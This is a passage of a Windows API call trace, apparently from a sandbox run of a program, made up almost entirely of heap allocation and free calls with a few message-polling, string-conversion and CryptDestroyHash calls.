(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0167.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0167.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0167.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0167.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0167.737] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0167.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d460 [0167.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d460, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0167.739] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0167.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0167.740] CryptDestroyHash (hHash=0x90ae18) returned 1 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.740] HeapFree (in: 